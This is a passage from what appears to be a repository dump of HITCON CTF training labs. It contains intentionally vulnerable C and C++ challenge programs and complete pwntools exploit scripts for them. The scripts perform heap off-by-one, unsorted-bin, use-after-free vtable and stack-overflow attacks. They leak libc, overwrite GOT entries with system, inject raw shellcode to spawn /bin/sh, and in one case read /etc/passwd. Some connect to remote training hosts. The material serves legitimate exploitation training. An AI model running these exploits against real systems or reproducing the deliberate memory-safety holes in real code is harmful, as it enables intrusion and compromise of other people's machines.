p64(fakeChunk)) # 0 40 | Raise(0x50, "111") # 1 41 | Raise(0x50, "000") 42 | # DEBUG() 43 | # payload = cyclic(8 - 2) + p64(magic) * 8 44 | payload = cyclic(8 + 8 - 2) + p64(magic) * 2 45 | Raise(0x50, payload) 46 | 47 | io.interactive() 48 | io.close() 49 | -------------------------------------------------------------------------------- /LAB/lab12/struct: -------------------------------------------------------------------------------- 1 | struct FLOWER 2 | { 3 | int inuse; 4 | char *name; 5 | char color[24]; 6 | } 7 | -------------------------------------------------------------------------------- /LAB/lab13/Makefile: -------------------------------------------------------------------------------- 1 | heapcreator:heapcreator.c 2 | gcc heapcreator.c -o heapcreator 3 | -------------------------------------------------------------------------------- /LAB/lab13/heapcreator: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab13/heapcreator -------------------------------------------------------------------------------- /LAB/lab13/heapcreator.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void read_input(char *buf,size_t size){ 6 | int ret ; 7 | ret = read(0,buf,size); 8 | if(ret <=0){ 9 | puts("Error"); 10 | _exit(-1); 11 | } 12 | } 13 | 14 | struct heap { 15 | size_t size ; 16 | char *content ; 17 | }; 18 | 19 | struct heap *heaparray[10]; 20 | 21 | void menu(){ 22 | puts("--------------------------------"); 23 | puts(" Heap Creator "); 24 | puts("--------------------------------"); 25 | puts(" 1. Create a Heap "); 26 | puts(" 2. Edit a Heap "); 27 | puts(" 3. Show a Heap "); 28 | puts(" 4. Delete a Heap "); 29 | puts(" 5. Exit "); 30 | puts("--------------------------------"); 31 | printf("Your choice :"); 32 | } 33 | 34 | void create_heap(){ 35 | int i ; 36 | char buf[8]; 37 | size_t size = 0; 38 | for(i = 0 ; i < 10 ; i++){ 39 | if(!heaparray[i]){ 40 | heaparray[i] = (struct heap *)malloc(sizeof(struct heap)); 41 | if(!heaparray[i]){ 42 | puts("Allocate Error"); 43 | exit(1); 44 | } 45 | printf("Size of Heap : "); 46 | read(0,buf,8); 47 | size = atoi(buf); 48 | heaparray[i]->content = (char *)malloc(size); 49 | if(!heaparray[i]->content){ 50 | puts("Allocate Error"); 51 | exit(2); 52 | } 53 | heaparray[i]->size = size ; 54 | printf("Content of heap:"); 55 | read_input(heaparray[i]->content,size); 56 | puts("SuccessFul"); 57 | break ; 58 | } 59 | } 60 | } 61 | 62 | void edit_heap(){ 63 | int idx ; 64 | char buf[4]; 65 | printf("Index :"); 66 | read(0,buf,4); 67 | idx = atoi(buf); 68 | if(idx < 0 || idx >= 10){ 69 | puts("Out of bound!"); 70 | _exit(0); 71 | } 72 | if(heaparray[idx]){ 73 | printf("Content of heap : "); 74 | read_input(heaparray[idx]->content,heaparray[idx]->size+1); 75 | puts("Done !"); 76 | }else{ 77 | puts("No such heap !"); 78 | } 79 | } 80 | 81 | void show_heap(){ 82 | int idx ; 83 | char buf[4]; 84 | printf("Index :"); 85 | read(0,buf,4); 86 | idx = atoi(buf); 87 | if(idx < 0 || idx >= 10){ 88 | puts("Out of bound!"); 89 | _exit(0); 90 | } 91 | if(heaparray[idx]){ 92 | printf("Size : %ld\nContent : %s\n",heaparray[idx]->size,heaparray[idx]->content); 93 | puts("Done !"); 94 | }else{ 95 | puts("No such heap !"); 96 | } 97 | 98 | } 99 | 100 | void delete_heap(){ 101 | int idx ; 102 | char buf[4]; 103 | printf("Index :"); 104 | read(0,buf,4); 105 | idx = atoi(buf); 106 | if(idx < 0 || idx >= 10){ 107 | puts("Out of bound!"); 108 | _exit(0); 109 | } 110 | if(heaparray[idx]){ 111 | free(heaparray[idx]->content); 112 | free(heaparray[idx]); 113 | heaparray[idx] = NULL ; 114 | puts("Done !"); 115 | }else{ 116 | puts("No such heap !"); 117 | } 118 | 119 | } 120 | 121 | 122 | int main(){ 123 | char buf[4]; 124 | setvbuf(stdout,0,2,0); 125 | setvbuf(stdin,0,2,0); 126 | while(1){ 127 | menu(); 128 | read(0,buf,4); 129 | switch(atoi(buf)){ 130 | case 1 : 131 | create_heap(); 132 | break ; 133 | case 2 : 134 | edit_heap(); 135 | break ; 136 | case 3 : 137 | show_heap(); 138 | break ; 139 | case 4 : 140 | delete_heap(); 141 | break ; 142 | case 5 : 143 | exit(0); 144 | break ; 145 | default : 146 | puts("Invalid Choice"); 147 | break; 148 | } 149 | 150 | } 151 | return 0 ; 152 | } 153 | -------------------------------------------------------------------------------- /LAB/lab13/heapcreator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # from pwnpwnpwn import * 4 | from pwn import * 5 | 6 | host = "training.pwnable.tw" 7 | port = 11013 8 | #host = "10.211.55.28" 9 | #port = 8888 10 | 11 | # r = remote(host,port) 12 | r = process("./heapcreator") 13 | 14 | 15 | def create(size,content): 16 | r.recvuntil(":") 17 | r.sendline("1") 18 | r.recvuntil(":") 19 | r.sendline(str(size)) 20 | r.recvuntil(":") 21 | r.sendline(content) 22 | 23 | def edit(idx,content): 24 | r.recvuntil(":") 25 | r.sendline("2") 26 | r.recvuntil(":") 27 | r.sendline(str(idx)) 28 | r.recvuntil(":") 29 | r.sendline(content) 30 | 31 | def show(idx): 32 | r.recvuntil(":") 33 | r.sendline("3") 34 | r.recvuntil(":") 35 | r.sendline(str(idx)) 36 | 37 | def delete(idx): 38 | r.recvuntil(":") 39 | r.sendline("4") 40 | r.recvuntil(":") 41 | r.sendline(str(idx)) 42 | 43 | free_got = 0x602018 44 | create(0x18,"dada") # 0 45 | create(0x10,"ddaa") # 1 46 | edit(0, "/bin/sh\x00" +"a"*0x10 + "\x41") 47 | delete(1) 48 | create(0x30,p64(0)*4 +p64(0x30) + p64(free_got)) #1 49 | show(1) 50 | r.recvuntil("Content : ") 51 | data = r.recvuntil("Done !") 52 | 53 | free_addr = u64(data.split("\n")[0].ljust(8,"\x00")) 54 | libc = free_addr - 0x83940 55 | print "libc:",hex(libc) 56 | system = libc + 0x45390 57 | edit(1,p64(system)) 58 | delete(0) 59 | r.interactive() 60 | -------------------------------------------------------------------------------- /LAB/lab13/libc-2.23.so.i386: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab13/libc-2.23.so.i386 -------------------------------------------------------------------------------- /LAB/lab13/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | __Auther__ = 'M4x' 4 | 5 | from pwn import * 6 | context.log_level = "debug" 7 | 8 | def create(size, content): 9 | io.sendlineafter(" :", "1") 10 | io.sendlineafter(" : ", str(size)) 11 | io.sendlineafter(":", content) 12 | 13 | def edit(idx, content): 14 | io.sendlineafter(" :", "2") 15 | io.sendlineafter(" :", str(idx)) 16 | io.sendlineafter(" : ", content) 17 | 18 | def show(idx): 19 | io.sendlineafter(" :", "3") 20 | io.sendlineafter(" :", str(idx)) 21 | 22 | def delete(idx): 23 | io.sendlineafter(" :", "4") 24 | io.sendlineafter(" :", str(idx)) 25 | 26 | if __name__ == "__main__": 27 | io = process("./heapcreator", {"LD_LOADPRE": "/lib/x86_64-linux-gnu/libc.so.6"}) 28 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 29 | 30 | create(0x18, '0000') # 0 31 | create(0x10, '1111') # 1 32 | 33 | payload = "/bin/sh\0" + cyclic(0x10) + p8(0x41) 34 | edit(0, payload) # overwrite 1 35 | 36 | delete(1) # overlapping chunk 37 | 38 | freeGot = 0x0000000000602018 39 | payload = p64(0) * 4 + p64(0x30) + p64(freeGot) 40 | create(0x30, payload) 41 | show(1) 42 | 43 | libcBase = u64(io.recvuntil("\x7f")[-6: ].ljust(8, "\x00")) - libc.sym["free"] 44 | success("libcBase -> {:#x}".format(libcBase)) 45 | # pause() 46 | edit(1, p64(libcBase + libc.sym["system"])) 47 | 48 | delete(0) 49 | io.interactive() 50 | io.close() 51 | -------------------------------------------------------------------------------- /LAB/lab13/struct: -------------------------------------------------------------------------------- 1 | struct HEAP 2 | { 3 | int size; 4 | char *content; 5 | } 6 | -------------------------------------------------------------------------------- /LAB/lab14/Makefile: -------------------------------------------------------------------------------- 1 | magicheap:magicheap.c 2 | gcc magicheap.c -o magicheap 3 | -------------------------------------------------------------------------------- /LAB/lab14/magicheap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab14/magicheap -------------------------------------------------------------------------------- /LAB/lab14/magicheap.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void read_input(char *buf,size_t size){ 6 | int ret ; 7 | ret = read(0,buf,size); 8 | if(ret <=0){ 9 | puts("Error"); 10 | _exit(-1); 11 | } 12 | } 13 | 14 | char *heaparray[10]; 15 | unsigned long int magic = 0 ; 16 | 17 | void menu(){ 18 | puts("--------------------------------"); 19 | puts(" Magic Heap Creator "); 20 | puts("--------------------------------"); 21 | puts(" 1. Create a Heap "); 22 | puts(" 2. Edit a Heap "); 23 | puts(" 3. Delete a Heap "); 24 | puts(" 4. Exit "); 25 | puts("--------------------------------"); 26 | printf("Your choice :"); 27 | } 28 | 29 | void create_heap(){ 30 | int i ; 31 | char buf[8]; 32 | size_t size = 0; 33 | for(i = 0 ; i < 10 ; i++){ 34 | if(!heaparray[i]){ 35 | printf("Size of Heap : "); 36 | read(0,buf,8); 37 | size = atoi(buf); 38 | heaparray[i] = (char *)malloc(size); 39 | if(!heaparray[i]){ 40 | puts("Allocate Error"); 41 | exit(2); 42 | } 43 | printf("Content of heap:"); 44 | read_input(heaparray[i],size); 45 | puts("SuccessFul"); 46 | break ; 47 | } 48 | } 49 | } 50 | 51 | void edit_heap(){ 52 | int idx ; 53 | char buf[4]; 54 | size_t size ; 55 | printf("Index :"); 56 | read(0,buf,4); 57 | idx = atoi(buf); 58 | if(idx < 0 || idx >= 10){ 59 | puts("Out of bound!"); 60 | _exit(0); 61 | } 62 | if(heaparray[idx]){ 63 | printf("Size of Heap : "); 64 | read(0,buf,8); 65 | size = atoi(buf); 66 | printf("Content of heap : "); 67 | read_input(heaparray[idx] ,size); 68 | puts("Done !"); 69 | }else{ 70 | puts("No such heap !"); 71 | } 72 | } 73 | 74 | 75 | void delete_heap(){ 76 | int idx ; 77 | char buf[4]; 78 | printf("Index :"); 79 | read(0,buf,4); 80 | idx = atoi(buf); 81 | if(idx < 0 || idx >= 10){ 82 | puts("Out of bound!"); 83 | _exit(0); 84 | } 85 | if(heaparray[idx]){ 86 | free(heaparray[idx]); 87 | heaparray[idx] = NULL ; 88 | puts("Done !"); 89 | }else{ 90 | puts("No such heap !"); 91 | } 92 | 93 | } 94 | 95 | 96 | void l33t(){ 97 | system("cat /home/magicheap/flag"); 98 | } 99 | 100 | int main(){ 101 | char buf[8]; 102 | setvbuf(stdout,0,2,0); 103 | setvbuf(stdin,0,2,0); 104 | while(1){ 105 | menu(); 106 | read(0,buf,8); 107 | switch(atoi(buf)){ 108 | case 1 : 109 | create_heap(); 110 | break ; 111 | case 2 : 112 | edit_heap(); 113 | break ; 114 | case 3 : 115 | delete_heap(); 116 | break ; 117 | case 4 : 118 | exit(0); 119 | break ; 120 | case 4869 : 121 | if(magic > 4869){ 122 | puts("Congrt !"); 123 | l33t(); 124 | }else 125 | puts("So sad !"); 126 | break ; 127 | default : 128 | puts("Invalid Choice"); 129 | break; 130 | } 131 | 132 | } 133 | return 0 ; 134 | } 135 | -------------------------------------------------------------------------------- /LAB/lab14/magicheap.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab14/magicheap.i64 -------------------------------------------------------------------------------- /LAB/lab14/magicheap.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | from pwn import * 4 | 5 | host = "training.pwnable.tw" 6 | port = 11014 7 | 8 | r = remote(host,port) 9 | 10 | 11 | def create_heap(size,content): 12 | r.recvuntil(":") 13 | r.sendline("1") 14 | r.recvuntil(":") 15 | r.sendline(str(size)) 16 | r.recvuntil(":") 17 | r.sendline(content) 18 | 19 | def edit_heap(idx,size,content): 20 | r.recvuntil(":") 21 | r.sendline("2") 22 | r.recvuntil(":") 23 | r.sendline(str(idx)) 24 | r.recvuntil(":") 25 | r.sendline(str(size)) 26 | r.recvuntil(":") 27 | r.sendline(content) 28 | 29 | def del_heap(idx): 30 | r.recvuntil(":") 31 | r.sendline("3") 32 | r.recvuntil(":") 33 | r.sendline(str(idx)) 34 | 35 | create_heap(0x80,"dada") # 0 36 | create_heap(0x20,"dada") # 1 37 | create_heap(0x80,"dada") # 2 38 | create_heap(0x20,"dada") # 3 39 | 40 | del_heap(2) 41 | del_heap(0) 42 | magic = 0x6020c0 43 | fd = 0 44 | bk = magic - 0x10 45 | 46 | edit_heap(1,0x20+0x20,"a"*0x20 + p64(0) + p64(0x91) + p64(fd) + p64(bk)) 47 | create_heap(0x80,"dada") #trigger unsorted bin attack 48 | r.recvuntil(":") 49 | r.sendline("4869") 50 | r.interactive() 51 | 52 | -------------------------------------------------------------------------------- /LAB/lab14/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | __Auther__ = 'M4x' 4 | 5 | from pwn import * 6 | from time import sleep 7 | import sys 8 | context.log_level = "debug" 9 | context.terminal = ["deepin-terminal", "-x", "sh", "-c"] 10 | 11 | io = process("./magicheap") 12 | elf = ELF("./magicheap") 13 | # libc = ELF("") 14 | 15 | def DEBUG(): 16 | raw_input("DEBUG: ") 17 | gdb.attach(io) 18 | 19 | 20 | def create(size, content, attack = False): 21 | io.sendlineafter("choice :", "1") 22 | io.sendlineafter(" : ", str(size)) 23 | io.sendlineafter(":", content) 24 | 25 | 26 | def edit(idx, size, content): 27 | io.sendlineafter("choice :", "2") 28 | io.sendlineafter(" :", str(idx)) 29 | io.sendlineafter(" : ", str(size)) 30 | io.sendlineafter(" : ", content) 31 | 32 | def delete(idx): 33 | io.sendlineafter("choice :", "3") 34 | io.sendlineafter(" :", str(idx)) 35 | 36 | 37 | if __name__ == "__main__": 38 | create(0x10, 'aaaa') 39 | create(0x80, 'bbbb') 40 | create(0x10, 'cccc') 41 | 42 | delete(1) 43 | 44 | payload = cyclic(0x10) + p64(0) + p64(0x91) + p64(0) + p64(elf.symbols["magic"] - 0x10) 45 | edit(0, 0x10 + 0x20, payload) 46 | 47 | create(0x80, 'dddd') 48 | 49 | io.sendlineafter("choice :", "4869") 50 | io.interactive() 51 | io.close() 52 | -------------------------------------------------------------------------------- /LAB/lab15/Makefile: -------------------------------------------------------------------------------- 1 | zoo:zoo.cpp 2 | g++ -z execstack zoo.cpp -o zoo 3 | -------------------------------------------------------------------------------- /LAB/lab15/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | __Auther__ = 'M4x' 4 | 5 | from pwn import * 6 | context.log_level = "debug" 7 | context.binary = "./zoo" 8 | context.terminal = ["deepin-terminal", "-x", "sh", "-c"] 9 | 10 | def addDog(name, weight): 11 | io.sendlineafter(":", "1") 12 | io.sendlineafter(":", name) 13 | io.sendlineafter(":", str(weight)) 14 | 15 | def remove(idx): 16 | io.sendlineafter(":", "5") 17 | io.sendlineafter(":", str(idx)) 18 | 19 | def listen(idx): 20 | io.sendlineafter(":", "3") 21 | io.sendlineafter(":", str(idx)) 22 | 23 | if __name__ == "__main__": 24 | io = process("./zoo") 25 | nameofzoo = 0x605420 26 | 27 | sc = asm(shellcraft.sh()) 28 | io.sendlineafter(":", sc + p64(nameofzoo)) 29 | 30 | addDog('0' * 8, 0) 31 | addDog('1' * 8, 1) 32 | remove(0) 33 | vptr = nameofzoo + len(sc) 34 | addDog('a' * 72 + p64(vptr), 2) 35 | listen(0) 36 | 37 | io.interactive() 38 | io.close() 39 | 40 | 41 | -------------------------------------------------------------------------------- /LAB/lab15/zoo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab15/zoo -------------------------------------------------------------------------------- /LAB/lab15/zoo.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | using namespace std; 7 | 8 | char nameofzoo[100]; 9 | 10 | class Animal { 11 | public : 12 | Animal(){ 13 | memset(name,0,24); 14 | weight = 0; 15 | } 16 | virtual void speak(){;} 17 | virtual void info(){;} 18 | protected : 19 | char name[24]; 20 | int weight; 21 | }; 22 | 23 | class Dog : public Animal{ 24 | public : 25 | Dog(string str,int w){ 26 | strcpy(name,str.c_str()); 27 | weight = w ; 28 | } 29 | virtual void speak(){ 30 | cout << "Wow ~ Wow ~ Wow ~" << endl ; 31 | } 32 | virtual void info(){ 33 | cout << "|---------------------|" << endl ; 34 | cout << "| Animal info |" << endl; 35 | cout << "|---------------------|" << endl; 36 | cout << " Weight :" << this->weight << endl ; 37 | cout << " Name : " << this->name << endl ; 38 | cout << "|---------------------|" << endl; 39 | } 40 | }; 41 | 42 | class Cat : public Animal{ 43 | public : 44 | Cat(string str,int w){ 45 | strcpy(name,str.c_str()); 46 | weight = w ; 47 | } 48 | virtual void speak(){ 49 | cout << "Meow ~ Meow ~ Meow ~" << endl ; 50 | } 51 | virtual void info(){ 52 | cout << "|---------------------|" << endl ; 53 | cout << "| Animal info |" << endl; 54 | cout << "|---------------------|" << endl; 55 | cout << " Weight :" << this->weight << endl ; 56 | cout << " Name : " << this->name << endl ; 57 | cout << "|---------------------|" << endl; 58 | } 59 | 60 | }; 61 | 62 | vector animallist ; 63 | 64 | void menu(){ 65 | cout << "*********************************" << endl ; 66 | cout << " 1. Add a dog " << endl ; 67 | cout << " 2. Add a cat " << endl ; 68 | cout << " 3. Listen a animal " << endl ; 69 | cout << " 4. Show a animal info " << endl ; 70 | cout << " 5. Remove a animal " << endl ; 71 | cout << " 6. Exit " << endl ; 72 | cout << "*********************************" << endl ; 73 | } 74 | 75 | 76 | void adddog(){ 77 | string name ; 78 | int weight ; 79 | cout << "Name : " ; 80 | cin >> name; 81 | cout << "Weight : " ; 82 | cin >> weight ; 83 | Dog *mydog = new Dog(name,weight); 84 | animallist.push_back(mydog); 85 | 86 | } 87 | 88 | void addcat(){ 89 | string name ; 90 | int weight ; 91 | cout << "Name : " ; 92 | cin >> name; 93 | cout << "Weight : " ; 94 | cin >> weight ; 95 | Cat *mycat = new Cat(name,weight); 96 | animallist.push_back(mycat); 97 | 98 | } 99 | 100 | void remove(){ 101 | unsigned int idx ; 102 | if(animallist.size() == 0){ 103 | cout << "no any animal!" << endl ; 104 | return ; 105 | } 106 | cout << "index of animal : "; 107 | cin >> idx ; 108 | if(idx >= animallist.size()){ 109 | cout << "out of bound !" << endl; 110 | return ; 111 | } 112 | delete animallist[idx]; 113 | animallist.erase(animallist.begin()+idx); 114 | 115 | 116 | } 117 | 118 | void showinfo(){ 119 | unsigned int idx ; 120 | if(animallist.size() == 0){ 121 | cout << "no any animal!" << endl ; 122 | return ; 123 | } 124 | cout << "index of animal : "; 125 | cin >> idx ; 126 | if(idx >= animallist.size()){ 127 | cout << "out of bound !" << endl; 128 | return ; 129 | } 130 | animallist[idx]->info(); 131 | 132 | } 133 | 134 | void listen(){ 135 | unsigned int idx ; 136 | if(animallist.size() == 0){ 137 | cout << "no any animal!" << endl ; 138 | return ; 139 | } 140 | cout << "index of animal : "; 141 | cin >> idx ; 142 | if(idx >= animallist.size()){ 143 | cout << "out of bound !" << endl; 144 | return ; 145 | } 146 | animallist[idx]->speak(); 147 | 148 | } 149 | int main(void){ 150 | unsigned int choice ; 151 | setvbuf(stdout,0,2,0); 152 | setvbuf(stdin,0,2,0); 153 | cout << "Name of Your zoo :" ; 154 | read(0,nameofzoo,100); 155 | while(1){ 156 | menu(); 157 | cout << "Your choice :"; 158 | cin >> choice ; 159 | cout << endl ; 160 | switch(choice){ 161 | case 1 : 162 | adddog(); 163 | break ; 164 | case 2 : 165 | addcat(); 166 | break ; 167 | case 3 : 168 | listen(); 169 | break ; 170 | case 4 : 171 | showinfo(); 172 | break ; 173 | case 5 : 174 | remove(); 175 | break ; 176 | case 6 : 177 | _exit(0); 178 | default : 179 | cout << "Invaild choice" << endl; 180 | break ; 181 | } 182 | } 183 | return 0 ; 184 | } 185 | 186 | -------------------------------------------------------------------------------- /LAB/lab15/zoo.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab15/zoo.i64 -------------------------------------------------------------------------------- /LAB/lab15/zoo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | from pwn import * 4 | 5 | host = "training.angelboy.tw" 6 | port = 11015 7 | context.arch = "amd64" 8 | # r = remote(host,port) 9 | r = process("./zoo") 10 | 11 | 12 | sc = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 13 | 14 | def add_dog(name,weight): 15 | r.recvuntil(":") 16 | r.sendline("1") 17 | r.recvuntil(":") 18 | r.sendline(name) 19 | r.recvuntil(":") 20 | r.sendline(str(weight)) 21 | 22 | def remove_ani(idx): 23 | r.recvuntil(":") 24 | r.sendline("5") 25 | r.recvuntil(":") 26 | r.sendline(str(idx)) 27 | 28 | 29 | name = 0x605420 30 | r.recvuntil(":") 31 | r.sendline("a"*8 + p64(name+8) + sc) 32 | add_dog("a"*8,0) 33 | add_dog("b"*8,1) 34 | remove_ani(0) 35 | vptr = name + 8 36 | add_dog("a"*72 + p64(vptr),2) 37 | r.recvuntil(":") 38 | r.sendline("3") 39 | r.recvuntil(":") 40 | r.sendline("0") 41 | 42 | r.interactive() 43 | -------------------------------------------------------------------------------- /LAB/lab2/Makefile: -------------------------------------------------------------------------------- 1 | orw:orw.c 2 | gcc -z execstack -m32 orw.c -o orw 3 | -------------------------------------------------------------------------------- /LAB/lab2/orw.asm: -------------------------------------------------------------------------------- 1 | section .text 2 | global _start 3 | _start 4 | jmp file 5 | open : 6 | pop ebx 7 | xor eax,eax 8 | mov al,5 9 | xor ecx,ecx 10 | int 0x80 11 | 12 | 13 | mov ebx,eax 14 | mov al,3 15 | mov ecx,esp 16 | mov dl,0x30 17 | int 0x80 18 | 19 | mov al,4 20 | mov bl,1 21 | mov dl,0x30 22 | int 0x80 23 | 24 | xor eax,eax 25 | inc eax 26 | int 0x80 27 | 28 | file : 29 | call open 30 | db '/etc/passwd',0x0 31 | -------------------------------------------------------------------------------- /LAB/lab2/orw.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab2/orw.bin -------------------------------------------------------------------------------- /LAB/lab2/orw.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | from pwn import * 4 | 5 | host = "training.pwnable.tw" 6 | port = "11002" 7 | 8 | r = remote(host,port) 9 | r.recvuntil(":") 10 | sc = "\xeb\x20\x5b\x31\xc0\xb0\x05\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe1\xb2\x30\xcd\x80\xb0\x04\xb3\x01\xb2\x30\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xdb\xff\xff\xff/home/orw/flag\x00" 11 | r.sendline(sc) 12 | r.interactive() 13 | -------------------------------------------------------------------------------- /LAB/lab2/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | __Auther__ = 'M4x' 4 | 5 | from pwn import * 6 | from pwn import shellcraft as sc 7 | context.log_level = "debug" 8 | 9 | shellcode = sc.pushstr("/home/m4x/HITCON-Training/LAB/lab2/testFlag") 10 | shellcode += sc.open("esp") 11 | # open返回的文件文件描述符存贮在eax寄存器里 12 | shellcode += sc.read("eax", "esp", 0x100) 13 | # open读取的内容放在栈顶 14 | shellcode += sc.write(1, "esp", 0x100) 15 | 16 | io = process("./orw.bin") 17 | io.sendlineafter("shellcode:", asm(shellcode)) 18 | print io.recvall() 19 | io.close() 20 | -------------------------------------------------------------------------------- /LAB/lab2/testFlag: -------------------------------------------------------------------------------- 1 | flag{testtesttest} 2 | -------------------------------------------------------------------------------- /LAB/lab3/Makefile: -------------------------------------------------------------------------------- 1 | ret2sc:ret2sc.c 2 | gcc -m32 -fno-stack-protector -z execstack ret2sc.c -o ret2sc 3 | -------------------------------------------------------------------------------- /LAB/lab3/ret2sc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab3/ret2sc -------------------------------------------------------------------------------- /LAB/lab3/ret2sc.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | char name[50]; 4 | 5 | int main(){ 6 | setvbuf(stdout,0,2,0); 7 | printf("Name:"); 8 | read(0,name,50); 9 | char buf[20]; 10 | printf("Try your best:"); 11 | gets(buf); 12 | return ; 13 | } 14 | -------------------------------------------------------------------------------- /LAB/lab3/ret2sc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | from pwn import * 4 | 5 | host = "10.211.55.28" 6 | port = 8888 7 | 8 | r = remote(host,port) 9 | name = 0x804a060 10 | r.recvuntil(":") 11 | r.sendline(asm(shellcraft.sh())) 12 | r.recvuntil(":") 13 | payload = "a"*32 14 | payload += p32(name) 15 | r.sendline(payload) 16 | 17 | r.interactive() 18 | -------------------------------------------------------------------------------- /LAB/lab3/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | __Auther__ = 'M4x' 4 | 5 | from pwn import * 6 | context(os = "linux", arch = "i386") 7 | 8 | io = process("./ret2sc") 9 | 10 | shellcode = asm(shellcraft.execve("/bin/sh")) 11 | io.sendlineafter(":", shellcode) 12 | 13 | payload = flat(cyclic(32), 0x804a060) 14 | io.sendlineafter(":", payload) 15 | 16 | io.interactive() 17 | io.close() 18 | -------------------------------------------------------------------------------- /LAB/lab4/Makefile: -------------------------------------------------------------------------------- 1 | ret2lib:ret2lib.c 2 | gcc -fno-stack-protector -mpreferred-stack-boundary=2 -m32 ret2lib.c -o ret2lib 3 | -------------------------------------------------------------------------------- /LAB/lab4/ret2lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab4/ret2lib -------------------------------------------------------------------------------- /LAB/lab4/ret2lib.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | void See_something(unsigned int addr){ 4 | int *address ; 5 | address = (int *)addr ; 6 | printf("The content of the address : %p\n",*address); 7 | }; 8 | 9 | void Print_message(char *mesg){ 10 | char buf[48]; 11 | strcpy(buf,mesg); 12 | printf("Your message is : %s",buf); 13 | } 14 | 15 | int main(){ 16 | char address[10] ; 17 | char message[256]; 18 | unsigned int addr ; 19 | puts("###############################"); 20 | puts("Do you know return to library ?"); 21 | puts("###############################"); 22 | puts("What do you want to see in memory?"); 23 | printf("Give me an address (in dec) :"); 24 | fflush(stdout); 25 | read(0,address,10); 26 | addr = strtol(address); 27 | See_something(addr) ; 28 | printf("Leave some message for me :"); 29 | fflush(stdout); 30 | read(0,message,256); 31 | Print_message(message); 32 | puts("Thanks you ~"); 33 | return 0 ; 34 | } 35 | -------------------------------------------------------------------------------- /LAB/lab4/ret2lib.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | from pwn import * 4 | 5 | host = "training.pwnable.tw" 6 | port = 11004 7 | 8 | r = remote(host,port) 9 | 10 | r.recvuntil(":") 11 | puts_got = 0x0804a01c 12 | 13 | r.sendline(str(puts_got)) 14 | r.recvuntil(": ") 15 | puts_adr = int(r.recvuntil("\n").strip(),16) 16 | puts_off = 0x5f140 17 | libc = puts_adr - puts_off 18 | print "libc : ",hex(libc) 19 | system = libc + 0x3a940 20 | sh = 0x804929e 21 | r.recvuntil(":") 22 | payload = "a"*60 23 | payload += p32(system) 24 | payload += "bbbb" 25 | payload += p32(sh) 26 | r.sendline(payload) 27 | r.interactive() 28 | -------------------------------------------------------------------------------- /LAB/lab4/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | __Auther__ = 'M4x' 4 | 5 | from pwn import * 6 | 7 | io = process("./ret2lib") 8 | elf = ELF("./ret2lib") 9 | libc = ELF("/lib/i386-linux-gnu/libc.so.6") 10 | 11 | io.sendlineafter(" :", str(elf.got["puts"])) 12 | io.recvuntil(" : ") 13 | libcBase = int(io.recvuntil("\n", drop = True), 16) - libc.symbols["puts"] 14 | 15 | success("libcBase -> {:#x}".format(libcBase)) 16 | # oneGadget = libcBase + 0x3a9fc 17 | 18 | # payload = flat(cyclic(60), oneGadget) 19 | payload = flat(cyclic(60), libcBase + libc.symbols["system"], 0xdeadbeef, next(elf.search("sh\x00"))) 20 | io.sendlineafter(" :", payload) 21 | 22 | io.interactive() 23 | io.close() 24 | -------------------------------------------------------------------------------- /LAB/lab5/makefile: -------------------------------------------------------------------------------- 1 | simplerop:simplerop.c 2 